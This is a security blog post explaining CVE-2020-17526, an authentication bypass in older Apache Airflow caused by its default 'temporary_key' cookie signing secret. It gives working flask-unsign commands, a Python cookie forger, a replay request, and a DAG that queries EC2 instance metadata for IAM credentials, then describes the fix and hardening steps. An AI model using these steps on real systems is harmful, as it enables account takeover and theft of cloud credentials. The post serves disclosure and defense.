This is a blog post on how a security misconfiguration in an older version of Apache Airflow could lead to an authentication bypass, allowing an attacker to log in as any user in the application. Once logged in, especially as an administrator, you would have access to features that could be used to execute code on the underlying server. For a cloud-hosted server, this could mean access to credentials that grant control of the entire cloud account.
Let's take a look at what the vulnerability is, why it occurs, how to exploit it, and what mitigations are in place in the patched version.
Apache Airflow is an open-source workflow management platform written in Python. Apart from several server-side Python scripts, it includes a web application, essentially written in Flask, that can be started from the command line as part of the Airflow platform.
The web application uses Flask's stateless, signed cookie to store and manage successful authentications. During installation, a user can be created using the airflow command; in the documentation, this user is given the Admin role. Any subsequent users can be created from the web interface or from the command line using the airflow Python script.
The bug arises from a default secret key being used to sign authentication information, a classic security misconfiguration. When a user logs in, a cookie called session is set containing the user's authentication information in JSON format. A key called user_id within the JSON identifies which user is logged in. This JSON is signed with a string configured in the airflow.cfg configuration file. Prior to versions 1.10.15 and 2.0.2, this string defaulted to temporary_key, and neither the official documentation nor the installation messages said anything about changing it.
Usage of a static, known key creates an interesting problem. An attacker can create a local installation of the same version as the target, log in as an administrator, and replay the session cookie to the target to log in as the administrator on the remote machine.
In this case, there are tools available to decode the cookie and recover the plaintext JSON (the cookie is signed, not encrypted, so its contents are readable by anyone). You can then update the user_id parameter, re-sign the cookie, and resend it to the server to impersonate the user whose user_id was specified.
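Because the payload segment of a Flask session cookie is just URL-safe base64, the decoding step can be sketched with nothing but the Python standard library. The cookie value below is hypothetical: its payload encodes {"user_id": 1}, and the signature segment is a placeholder.

```python
import base64
import json
import zlib

def decode_flask_session(cookie: str) -> dict:
    # A Flask session cookie is "<payload>.<timestamp>.<signature>".
    # The payload is readable without the secret key because it is
    # only signed, not encrypted. A leading '.' marks a zlib-compressed payload.
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    data = base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4))
    if compressed:
        data = zlib.decompress(data)
    return json.loads(data)

# Hypothetical cookie; only the payload segment matters for decoding.
print(decode_flask_session("eyJ1c2VyX2lkIjoxfQ.YFn1rw.SIGNATURE"))
# {'user_id': 1}
```

This is exactly why the signing key matters: reading the cookie requires no secret at all, and only the signature stops anyone from writing one.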
To attack this setup, let’s see what’s required.
When you browse to the target web application, it sets a cookie called session.
We can crack the signing key and decode this cookie to plain text using the flask-unsign tool and the following command:

```shell
flask-unsign --unsign --cookie '<session cookie value>'
```
Once the plaintext signing key and the decoded session value are obtained, we can set the desired user_id in the JSON and re-sign the cookie using flask-unsign.
```shell
flask-unsign --sign --secret 'temporary_key' --cookie "<decoded session value with the new user_id>"
```
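Under the hood, the signing flask-unsign performs can be approximated with the standard library alone. The sketch below mimics the scheme Flask uses via itsdangerous (HMAC-SHA1 with the salt "cookie-session"); exact details such as the timestamp epoch and serializer tagging vary across itsdangerous versions, which is why a purpose-built tool like flask-unsign is preferred in practice. The function names here are mine, not part of any library.

```python
import base64
import hashlib
import hmac
import json
import time

def b64(raw: bytes) -> str:
    # itsdangerous-style URL-safe base64 without padding
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def forge_flask_cookie(secret: str, payload: dict) -> str:
    # Flask derives the signing key as HMAC-SHA1(secret, "cookie-session")
    # and signs "<payload>.<timestamp>" with that derived key.
    body = b64(json.dumps(payload, separators=(",", ":")).encode())
    ts = b64(int(time.time()).to_bytes(8, "big").lstrip(b"\x00"))
    value = f"{body}.{ts}".encode()
    derived = hmac.new(secret.encode(), b"cookie-session", hashlib.sha1).digest()
    sig = b64(hmac.new(derived, value, hashlib.sha1).digest())
    return f"{body}.{ts}.{sig}"

print(forge_flask_cookie("temporary_key", {"user_id": "1"}))
```

With the key fixed to temporary_key, anyone can produce a cookie that the target server will accept as valid.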
Replace the session cookie in the browser using Browser Tools > Storage > Cookies (or use the Burp proxy) and navigate to /home to log in to the administrative panel.
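The same replay can be scripted instead of done in the browser. A minimal sketch with the standard library, assuming a hypothetical target host and a forged cookie whose signature is truncated here:

```python
import urllib.request

# Hypothetical target and forged cookie (signature segment truncated).
forged = "eyJ1c2VyX2lkIjoxfQ.YFn1rw.<signature>"
req = urllib.request.Request(
    "http://airflow.example.com:8080/home",
    headers={"Cookie": f"session={forged}"},
)
# resp = urllib.request.urlopen(req)  # would return the admin panel on a live target
print(req.get_header("Cookie"))
```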
## Post exploitation cloud compromise
As an attacker who is after the cloud account or the server on which the web application is running, additional exploitation is required. An attacker could leverage their admin access to pivot further via stored cloud credentials within the web application, code-execution capabilities within the application that allow searching the file system or interacting with instance metadata, or configuration information providing SSH access to the server.
By itself, the Airflow web interface does not have a lot of attacker-friendly features. However, to become productive with the web app, administrators often install the DAGs Code Editor plugin, enabling code-editing capabilities within the browser.
This allows a user to create and execute new DAGs (Directed Acyclic Graphs). A DAG is a collection of all the tasks you want to run, organized in a way that reflects their relationships and dependencies.
Use the DAGs Code Editor under the Admin menu to launch the editor. A simple DAG such as the following can be created on the server and scheduled (or triggered manually) to run:
```python
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import datetime

with DAG(dag_id='bash_dag', schedule_interval=None,
         start_date=datetime(2021, 1, 1), catchup=False) as dag:
    bash_task = BashOperator(task_id='bash_task',
                             bash_command='curl http://169.254.169.254/latest/meta-data/')
```
You can see the output of the DAG via the Graph View > Logs feature.
Update the bash_command parameter using the DAGs Code Editor to fetch the name of the role attached to the EC2 instance.
Once the IAM role is obtained, update the DAG code using the DAGs Code Editor to fetch AWS credentials.
You can now configure your AWS CLI to use these credentials and access the underlying AWS cloud platform!
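The metadata service returns the role's temporary credentials as a JSON document. A sketch of turning that response into the environment variables the AWS CLI reads is below; the sample response is hypothetical, and the credential values are AWS's documented example placeholders, not real secrets.

```python
import json

# Hypothetical response from
# http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# (values are AWS's documented example placeholders)
sample = """{
  "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjEXAMPLETOKEN",
  "Expiration": "2021-04-01T12:00:00Z"
}"""

creds = json.loads(sample)
# Emit the environment variables the AWS CLI reads for temporary credentials.
for env, key in [("AWS_ACCESS_KEY_ID", "AccessKeyId"),
                 ("AWS_SECRET_ACCESS_KEY", "SecretAccessKey"),
                 ("AWS_SESSION_TOKEN", "Token")]:
    print(f"export {env}='{creds[key]}'")
```

Note that all three variables are needed: role credentials are temporary, so the session token must accompany the key pair.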
## Fix and defense in depth tips
CVE-2020-17526 was fixed in versions 1.10.15 and 2.0.2 by removing the static string and using b64encode(os.urandom(16)).decode('utf-8') to generate a random string as the key the web server uses to sign sessions. Additionally, a check was added to the webserver command module to shut down the server if the key is found to be temporary_key.
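A minimal sketch of both changes, paraphrased rather than the verbatim Airflow source (the function name and message below are mine):

```python
import os
import sys
from base64 import b64encode

# New default: a random per-installation key instead of "temporary_key".
SECRET_KEY = b64encode(os.urandom(16)).decode('utf-8')

def check_secret_key(secret_key: str) -> None:
    # Paraphrase of the guard added to the webserver command module:
    # refuse to start while the insecure default is still configured.
    if secret_key == "temporary_key":
        print("ERROR: The secret_key in airflow.cfg is still the insecure "
              "default. Set it to a random value and restart the webserver.")
        sys.exit(1)

check_secret_key(SECRET_KEY)  # a random key passes the check
```

The shutdown guard matters for upgrades: a randomized default alone would not protect existing installations that carried the old temporary_key value forward in airflow.cfg.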
From a defense in depth perspective, the following pointers will help avoid discovery and exploitation of vulnerabilities such as these:
- Ensure apps and services are not unnecessarily exposed to the world. Lockdown access using Security Groups and Network Firewalls by specifying source/destination addresses for specific hosts as required.
- Ensure apps and services use secure defaults, strong passphrases, and strong, well-supported cryptographic keys and algorithms.
- Ensure vendor patches are applied and periodic patch rollouts are planned. Review the security guidelines and documentation that the vendor provides, and additionally research security literature covering vulnerabilities and exploits for the specific vendor and app.
- Ensure only the required user roles are created within the app as well as on the underlying system. Do not grant extraneous privileges to the instance role attached to the EC2 instance.
- Ensure monitoring and alerting are in place, as available via the cloud provider. CloudTrail logs to a dedicated S3 bucket and CloudWatch alarms for sensitive API usage need to be in place. Use the Logging and Monitoring sections of the CIS Benchmarks for AWS to harden your setup.
- Use tools and processes to know what is running within your cloud infrastructure at all times. Attackers often tend to spin up machines in a region that is seldom used, for example. Visibility of what is running within your infrastructure is key to ensuring security hygiene.
Any software can become vulnerable due to poor programming, insecure defaults, or security misconfigurations. For many versions, Apache Airflow used a static key to sign its authentication cookie, so a valid cookie for any user could be generated by an attacker outside the web application. Replaying the newly generated session cookie then leads to an authentication bypass. Post-exploitation would involve finding functionality or a vulnerability that allows code execution on the underlying server.
In the case of cloud environments, this can become even more dangerous, as an attacker could reach the underlying cloud platform by finding credentials on the host or by accessing the instance metadata to find IAM instance role credentials. In any case, a defense-in-depth approach is recommended to guard against attack and exploitation.
- Airflow installation document
- Apache Airflow Incorrect Session Validation in Airflow Webserver with default config
- Exploiting outdated Apache Airflow instances